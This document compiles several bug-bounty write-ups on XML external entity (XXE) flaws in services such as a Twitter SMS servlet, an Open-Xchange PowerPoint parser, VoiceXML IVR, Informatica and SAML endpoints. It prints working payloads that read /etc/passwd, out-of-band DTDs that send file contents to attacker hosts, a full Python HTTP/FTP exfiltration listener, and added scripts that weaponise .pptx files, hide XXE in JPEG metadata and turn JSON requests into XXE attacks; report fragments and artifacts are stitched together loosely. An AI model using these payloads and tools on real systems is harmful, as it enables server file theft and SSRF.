The researcher was able to get a backend server (a third-party server) to reach out to the attacker-controlled server (122.180.248.81) to retrieve an XML external entity. This was a blind XXE: the researcher was unable to extract any sensitive information from the response. The PoC of the XXE-based SSRF is shown below.
The modified request with the XML Payload in the HTTP POST request body:
Burp Suite Repeater with payload and response
The web server logs show the backend server (8.36.86.68) reaching out to retrieve the XML External Entity:
The researcher discovered an XXE vulnerability in a Cloudhopper SXMP servlet on the sms-be-vip.twitter.com domain. This XXE allowed local file retrieval and SSRF. The HTTP POST request to the /api/sxmp/1.0 path is vulnerable to XXE; the payload can be seen on lines 7-11 of the request:
HTTP Response contains the contents of the /etc/passwd file in an error message:
The researcher discovered a PowerPoint file parser on an Open-Xchange server that resolves XML external entities, and was able to exfiltrate web server files to an attacker-controlled server.
The process is as follows:
Create a PowerPoint file. Use WinRAR to open the newly created file (a .pptx is a ZIP archive). Open ppt/tableStyles.xml, which should look like this:
Add the payload as the second line of tableStyles.xml (directly after the XML declaration) and save the file:
The Python code below runs on the attacker-controlled server. When it receives an HTTP request it answers with the DTD held in the dtd string: that DTD reads /etc/hostname into a parameter entity and defines a general entity whose URL sends the file's contents to the attacker-controlled server via FTP. The first connection the script accepts is treated as the HTTP request and is served the DTD; the second is treated as the FTP session, where a small command loop emulates an FTP server, waits for the victim server to connect, and reads the data it sends in the RETR command.
With the Python code running on the attacker-controlled server, the malicious PowerPoint file is uploaded to the Open-Xchange server. This forces the backend server to parse the PowerPoint file, process the tableStyles.xml inside it, issue an HTTP request to retrieve the DTD, process it, and exfiltrate /etc/hostname via FTP to the attacker-controlled server. The hostname extracted is shown below:
sandbox-1
This is a successful out-of-band XXE exploit that retrieves files from the web server to an attacker-controlled server, using HTTP to deliver the DTD and FTP to carry the data out.
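Building the malicious file programmatically, as an added example rather than the researcher's own tooling: the script below opens any .pptx (an OOXML ZIP package), rewrites ppt/tableStyles.xml so that a DOCTYPE in the shape of the page's payload sits directly after the XML declaration and the root element contains &exfil;, and copies every other part unchanged. The listener address is a placeholder (TEST-NET), and the tiny package produced by build_sample_pptx() is a constructed stand-in for a freshly saved presentation so that the script runs offline. The same declaration-then-DOCTYPE placement is what the XLF template and SAMLResponse cases later on this page rely on.

```python
import io
import re
import zipfile

HOST, PORT = '203.0.113.10', 443  # assumption: attacker-controlled listener (TEST-NET address)


def xxe_doctype(root_element, host, port):
    """DOCTYPE in the shape of the page's tableStyles.xml payload: load a remote
    parameter-entity DTD, then reference the entity it defines."""
    return ('<!DOCTYPE {root} [<!ELEMENT {root} ANY >'
            '<!ENTITY % sp SYSTEM "http://{host}:{port}/">%sp;%param1;]>'
            ).format(root=root_element, host=host, port=port).encode('utf-8')


def inject_doctype(xml, doctype, root_element, entity=b'exfil'):
    """Insert `doctype` directly after the XML declaration (a DOCTYPE before it is a
    fatal error) and put &exfil; inside the root element so the remote DTD's general
    entity is actually expanded. A freshly saved tableStyles.xml has a self-closing
    root, which is turned into an open/close pair."""
    decl = re.match(rb'\s*<\?xml[^>]*\?>', xml)
    cut = decl.end() if decl else 0
    head, body = xml[:cut], xml[cut:]
    name = re.escape(root_element.encode('utf-8'))
    ref = b'&' + entity + b';'
    close = b'</' + root_element.encode('utf-8') + b'>'
    body, n = re.subn(rb'<(' + name + rb'\b[^>]*?)\s*/>',
                      lambda m: b'<' + m.group(1) + b'>' + ref + close, body, count=1)
    if n == 0:  # root already has children: put the reference right after its start tag
        body, n = re.subn(rb'(<' + name + rb'\b[^>]*>)', lambda m: m.group(1) + ref, body, count=1)
    if n == 0:
        raise ValueError('root element %s not found' % root_element)
    return (head + b'\n' if head else b'') + doctype + b'\n' + body.lstrip()


def poison_ooxml(package, part, doctype, root_element):
    """Return a copy of the OOXML package with `part` rewritten; every other entry,
    including [Content_Types].xml and the entry order, is preserved."""
    src = zipfile.ZipFile(io.BytesIO(package))
    out = io.BytesIO()
    with zipfile.ZipFile(out, 'w') as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                data = inject_doctype(data, doctype, root_element)
            dst.writestr(info, data)  # keeps the original compression method and timestamp
    return out.getvalue()


def list_parts(package):
    return zipfile.ZipFile(io.BytesIO(package)).namelist()


def read_part(package, part):
    return zipfile.ZipFile(io.BytesIO(package)).read(part)


def build_sample_pptx():
    """Constructed stand-in for a freshly saved PowerPoint file: only the parts this example touches."""
    decl = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('[Content_Types].xml', decl + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr('ppt/presentation.xml', decl + '<p:presentation xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        z.writestr('ppt/tableStyles.xml', decl + '<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}"/>')
    return buf.getvalue()


if __name__ == '__main__':
    evil = poison_ooxml(build_sample_pptx(), 'ppt/tableStyles.xml',
                        xxe_doctype('a:tblStyleLst', HOST, PORT), 'a:tblStyleLst')
    print(read_part(evil, 'ppt/tableStyles.xml').decode('utf-8'))
```

To weaponise a real presentation, pass the bytes of an existing .pptx to poison_ooxml() instead of build_sample_pptx() and write the result back out; the rewritten tableStyles.xml comes out in the same form as the payload shown on this page.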
"VoiceXML (VXML) is a digital document standard for specifying interactive media and voice dialogs between humans and computers. It is used for developing audio and voice response applications"
When a user purchases a phone number through █████, they are given an option to forward inbound calls to an Interactive Voice Response (IVR) script written in VoiceXML.
An attacker can host a VoiceXML file that contains a DTD, and the IVR system will process its entities.
Upload the following payload.vxml and lol.xml files to the web root of the attacker-controlled web server:
payload.vxml
lol.xml
Visit the website and click "edit" on the phone number. Click "Forward to VoiceXML" and enter the attacker-controlled script URL, https://attacker.com/payload.vxml (the two files listed later on this page use example.com as a placeholder for that host).
Start a netcat listener on port 1337 on the attacker-controlled web server and call the phone number.
The service retrieves payload.vxml, which in turn pulls in lol.xml, and the contents of /etc/passwd are sent to the attacker-controlled web server on port 1337 as part of the request URL.
The Site Audit function spiders a given website and analyses the discovered pages. To improve spidering, the URL of a sitemap.xml file can be provided; if it is, the sitemap.xml file is downloaded and processed by a Java XML processor.
The Java XML processor used is vulnerable to XXE: by supplying a document type definition (DTD) that references external resources, the processor can be coerced into resolving external entities.
Malicious sitemap.xml containing the XXE payload in lines 2-4, with the external entity &xxe; placed in the <loc> value so that the web server reaches out for the XML external entity:
Web server logs showing the XML parser retrieving the XML External Entity:
This vulnerability was further exploited to retrieve a directory listing of the /home path (Java's file: URL handler returns a directory listing when the target is a directory, which is what makes this possible):
sitemap.xml
combine.dtd
Attacker web server logs showing the output of the /home directory listing:
Another XXE, on a Mail.ru domain, where the researcher demonstrated a blind XXE that can confirm whether a file exists on the server: the XXE-triggered SSRF reaches the attacker-controlled server only if the file exists (no callback occurs when the file does not exist).
XML Payload:
Multiple requests from the Mail.ru backend server to the attacker-controlled server follow the upload of the file.
The researcher found that the HTTP POST route /edit-profile-avatar!uploadImage.jspa, used for uploading user profile avatars, was vulnerable to XXE. The backend server processes the JPEG image and parses its XMP metadata, and that XML parsing is vulnerable to XXE.
The image below shows part of the JPEG file data with the XMP metadata containing the payload:
JPEG XMP Metadata containing XXE Payload
Web server logs:
The researcher further exploited this to retrieve the web server's /etc/passwd file out-of-band via FTP. Unfortunately the payload embedded in the image is not included in the report.
DTD Used
Attacker controlled FTP Server retrieving the /etc/passwd file from the vulnerable Informatica web server:
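How a payload like this rides inside a JPEG, as an added example (the researcher's actual image and DTD are not public, so the packet below is an assumed payload in the same out-of-band shape as the others on this page): XMP is an XML packet stored in an APP1 segment whose body starts with the namespace string "http://ns.adobe.com/xap/1.0/" followed by a NUL byte. add_xmp() inserts such a segment right after the SOI marker of any JPEG and read_xmp() walks the segments to pull the packet back out, which is also how you would check an upload for a DOCTYPE before handing it to a metadata parser. The carrier produced by build_carrier() is a constructed SOI/APP0/EOI skeleton with no picture data, and the callback host is a placeholder.

```python
import struct

SOI, EOI_BYTES = b'\xff\xd8', b'\xff\xd9'
APP0, APP1, SOS, EOI = 0xE0, 0xE1, 0xDA, 0xD9
XMP_NS = b'http://ns.adobe.com/xap/1.0/\x00'
CALLBACK = 'http://203.0.113.10/xxe.dtd'  # assumption: attacker-controlled server (TEST-NET)


def xmp_packet(callback):
    """XMP packet carrying a DOCTYPE that loads a remote parameter-entity DTD."""
    return ('<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>'
            '<!DOCTYPE x:xmpmeta [<!ENTITY % remote SYSTEM "{callback}">%remote;]>'
            '<x:xmpmeta xmlns:x="adobe:ns:meta/">'
            '<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"/>'
            '</x:xmpmeta><?xpacket end="w"?>').format(callback=callback).encode('utf-8')


def segment(marker, payload):
    """One JPEG marker segment: FF, marker byte, 2-byte big-endian length that counts
    itself, then the payload. A single segment cannot exceed 65535 bytes."""
    if len(payload) + 2 > 0xFFFF:
        raise ValueError('payload too large for a single APP1 segment')
    return b'\xff' + bytes([marker]) + struct.pack('>H', len(payload) + 2) + payload


def add_xmp(jpeg, packet):
    """Insert an XMP APP1 segment immediately after SOI; everything else is kept as is."""
    if not jpeg.startswith(SOI):
        raise ValueError('not a JPEG: missing SOI marker')
    return SOI + segment(APP1, XMP_NS + packet) + jpeg[2:]


def read_xmp(jpeg):
    """Walk the marker segments before the scan data and return the XMP packet, or None."""
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (SOS, EOI):
            break
        length = struct.unpack('>H', jpeg[pos + 2:pos + 4])[0]
        payload = jpeg[pos + 4:pos + 2 + length]
        if marker == APP1 and payload.startswith(XMP_NS):
            return payload[len(XMP_NS):]
        pos += 2 + length
    return None


def build_carrier():
    """Constructed minimal JPEG container: SOI, a JFIF APP0 header, EOI. No image data."""
    jfif = b'JFIF\x00' + b'\x01\x01' + b'\x00' + struct.pack('>HH', 1, 1) + b'\x00\x00'
    return SOI + segment(APP0, jfif) + EOI_BYTES


if __name__ == '__main__':
    evil = add_xmp(build_carrier(), xmp_packet(CALLBACK))
    print(read_xmp(evil).decode('utf-8'))
```

On a real upload path the defensive use of read_xmp() is the interesting one: any APP1 XMP packet that contains a DOCTYPE has no business in a profile picture and can be rejected before the XML parser ever sees it.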
Informatica
The SAMLResponse body parameter of an HTTP POST request is vulnerable to XXE. The researcher inserted the payload into the XML carried inside the base64-encoded parameter value.
Payload:
<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>
HTTP POST Request:
The attacker-controlled server (95.213.191.87) shows the internal Informatica server (54.149.98.204) reaching out to retrieve the XML external entity:
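Both sides of this finding, as an added example that is not part of the report: the page's DOCTYPE payload is placed after the XML declaration of a SAML Response and base64/form-encoded the way the HTTP-POST binding submits it, and the decoded message is then fed to the standard library's expat parser offline. A parser that follows parameter entities asks to fetch http://evilhost (that request is the SSRF the researcher observed; here the handler only records the URL), while a parser that forbids DOCTYPE rejects the message before any entity is declared or resolved. The Response body is a constructed minimal stand-in, and Informatica's real parser is a Java one rather than expat.

```python
import base64
import re
import xml.parsers.expat as expat
from urllib.parse import quote, unquote_plus

PAYLOAD = '<!DOCTYPE foo [ <!ENTITY % asd SYSTEM "http://evilhost"> %asd;]>'

# constructed stand-in for a SAML 2.0 Response: just enough to be well-formed
SAML_RESPONSE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'ID="_constructed" Version="2.0" IssueInstant="2020-01-01T00:00:00Z">'
    '<samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>'
    '</samlp:Response>'
)


def insert_doctype(xml, doctype):
    """Put the DOCTYPE directly after the <?xml ...?> declaration; anything before it is a fatal error."""
    m = re.match(r'\s*<\?xml[^>]*\?>', xml)
    cut = m.end() if m else 0
    return xml[:cut] + doctype + xml[cut:]


def encode_saml_response(xml):
    """HTTP-POST binding: base64 the XML, then form-urlencode it for the SAMLResponse parameter."""
    return quote(base64.b64encode(xml.encode('utf-8')).decode('ascii'), safe='')


def decode_saml_response(param):
    return base64.b64decode(unquote_plus(param)).decode('utf-8')


def fetch_attempts(xml):
    """URLs a parser that resolves parameter entities would fetch. Nothing is contacted:
    the handler records the system identifier and tells expat to carry on."""
    urls = []
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_ref(context, base, system_id, public_id):
        urls.append(system_id)
        return 1  # continue as if the entity had been loaded

    p.ExternalEntityRefHandler = on_external_ref
    p.Parse(xml, True)
    return urls


class DoctypeForbidden(ValueError):
    pass


def parse_without_dtd(xml):
    """Hardened receive path: abort on the DOCTYPE itself, before any entity exists."""
    p = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden('DOCTYPE %r not allowed in SAMLResponse' % name)

    p.StartDoctypeDeclHandler = on_doctype
    seen = []
    p.StartElementHandler = lambda name, attrs: seen.append(name)
    p.Parse(xml, True)
    return seen


def check_saml_response(param):
    """(True, element names) for a clean message, (False, reason) when it carries a DTD."""
    try:
        return True, parse_without_dtd(decode_saml_response(param))
    except DoctypeForbidden as e:
        return False, str(e)


if __name__ == '__main__':
    evil = encode_saml_response(insert_doctype(SAML_RESPONSE, PAYLOAD))
    print('SAMLResponse=' + evil[:60] + '...')
    print('parser would fetch:', fetch_attempts(decode_saml_response(evil)))
    print('hardened parser:', check_saml_response(evil))
    print('clean message:', check_saml_response(encode_saml_response(SAML_RESPONSE)))
```

Refusing the DOCTYPE outright, rather than only disabling external entities, is the check that matters for a SAML endpoint: a legitimate assertion never carries a DTD, so there is nothing to lose by rejecting it at the first declaration.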
The HTTP POST request accepts an XML body with an XXE payload. I believe the error message is just for the PoC and that removing the '1' after "///etc/passwd1" would return the full file.
Payload:
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd1" >]><count><tabName>profile</tabName><widgetID>&xxe;</widgetID><filterType>Only</filterType>
HTTP POST Request with payload:
Response below:
Informatica (3)
The researcher found a request with a JSON body. By changing the Content-Type header from 'application/json' to 'application/xml' and converting the JSON body to XML, the researcher got the web server to respond with an error message, and was then able to retrieve the /etc/passwd file out-of-band.
Original Request Unmodified:
Modified Request changing content type and converting JSON to XML:
HTTP Response:
The researcher then changed the payload to retrieve /etc/passwd through an out-of-band vector:
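The Content-Type switch described above, done programmatically, as an added example that is not the researcher's code: a JSON request body is converted into an equivalent XML document (objects become child elements, arrays repeat their tag, scalars become text), the classic DOCTYPE is placed after the XML declaration, and one chosen field is replaced by the &xxe; reference so that the parser's error message, or an out-of-band DTD, carries the file contents. The sample body and the field path are constructed for illustration; the report's actual request is not reproduced here.

```python
import json
from xml.sax.saxutils import escape

DOCTYPE = '<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'


def json_to_xml(value, tag, inject=None, path=()):
    """Serialize a decoded JSON value as XML. The element whose key path equals
    `inject` gets the literal, unescaped '&xxe;' reference instead of its value;
    every other string is escaped so the document stays well-formed."""
    if path == inject:
        return '<%s>&xxe;</%s>' % (tag, tag)
    if isinstance(value, dict):
        inner = ''.join(json_to_xml(v, k, inject, path + (k,)) for k, v in value.items())
        return '<%s>%s</%s>' % (tag, inner, tag)
    if isinstance(value, list):
        return ''.join(json_to_xml(v, tag, inject, path + (i,)) for i, v in enumerate(value))
    if value is None:
        return '<%s/>' % tag
    if isinstance(value, bool):  # bool is an int subclass, so test it before str()
        value = 'true' if value else 'false'
    return '<%s>%s</%s>' % (tag, escape(str(value)), tag)


def to_xxe_request(json_body, root='root', inject=('username',)):
    """JSON request body -> (headers, XML body) ready to resend with the XML content type."""
    body = json.loads(json_body)
    if isinstance(body, list):  # a top-level array still needs a single root element
        body = {'item': body}
    xml = '<?xml version="1.0" encoding="UTF-8"?>' + DOCTYPE + json_to_xml(body, root, inject)
    return {'Content-Type': 'application/xml'}, xml


# constructed sample request body
SAMPLE = '{"username": "alice", "profile": {"email": "a@example.com", "tags": ["x", "y"]}, "active": true}'

if __name__ == '__main__':
    headers, xml = to_xxe_request(SAMPLE)
    print(headers)
    print(xml)
```

Which field to point `inject` at is the only judgement call: pick one the backend echoes or type-checks (the report's error message came from exactly such a field), since a value that is silently stored gives no in-band signal.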
Researcher discovered that a file upload function is vulnerable to XXE. Quoting the researcher 4cad:
The core of the vulnerability is in how the translate-toolkit processes .XLF files. The XLIFF standard is XML-based, and thus supports by default standard XML functionality, including external entity execution.
The researcher retrieved a standard template file from the application, then modified it so that the two-line payload follows the '<?xml' declaration and replaced one of the translation texts with '&xxe;'.
Two-line Payload:
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
The full modified file, with the replaced translation text '&xxe;' on line 27:
When the file is uploaded, the web server outputs the contents of /etc/passwd in the web UI:
<?xml version="1.0"?>
<operation type="deliver">
<error code="1010" message="Unable to convert [root:x:0:0:root:/root:/bin/bash...[truncated by researcher] to an integer for [operatorId]"/>
</operation>
tableStyles.xml (modified)
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE a:tblStyleLst [<!ELEMENT a:tblStyleLst ANY ><!ENTITY % sp SYSTEM "http://54.227.205.198:443/">%sp;%param1;]>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}">&exfil;</a:tblStyleLst>
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
import socket

HOST = '54.227.205.198'
PORT = 443

# This DTD is returned on the first (HTTP) connection: it reads /etc/hostname into
# a parameter entity and defines the general entity &exfil; whose URL carries that
# content back to this host over FTP
dtd = '''<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://{}:{}/%data;'>">'''.format(HOST, PORT)

# Create a socket and bind it to all interfaces on the chosen port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', PORT))
s.listen(1)

conn, addr = s.accept()  # wait for the incoming HTTP connection
print('-> HTTP-connection accepted from', addr[0])
# Read the request and send the DTD, emulating an HTTP server
data = conn.recv(1024)
conn.sendall('HTTP/1.1 200 OK\r\nContent-length: {len}\r\n\r\n{dtd}'.format(len=len(dtd), dtd=dtd).encode('ascii'))
print('-> DTD sent')
conn.close()

conn, addr = s.accept()  # wait for the incoming FTP connection
print('-> FTP-connection accepted from', addr[0])
conn.sendall(b'220 FTP\r\n')  # emulate an FTP server banner
stop = False
while not stop:
    data = conn.recv(1024).decode('latin-1')  # read client commands
    if not data:  # client went away
        break
    # if the client sends USER, ask for a password to emulate
    # FTP authentication properly
    if data.startswith('USER'):
        conn.sendall(b'331 password please\r\n')
    # the RETR command carries the extracted data (the path from the entity URL)
    elif data.startswith('RETR'):
        print('-> RETR command received, extracted data:')
        print('-' * 30)
        print(data.split(' ', 1)[-1])
        stop = True
    elif data.startswith('QUIT'):  # stop if the client asks
        stop = True
    # ask for more data otherwise
    else:
        conn.sendall(b'230 more data please\r\n')
conn.close()
s.close()
<?xml version='1.0' encoding='UTF-8' ?>
<!DOCTYPE foo [
<!ENTITY % b SYSTEM "file:///etc/passwd">
<!ENTITY % asd SYSTEM "http://example.com/lol.xml"> %asd; %rrr;]>
<vxml version="2.1">
<form>
<block>
<prompt>payload executed</prompt>
</block>
</form>
</vxml>
<!ENTITY % c "<!ENTITY % rrr SYSTEM 'http://example.com:1337/%b;'>">%c;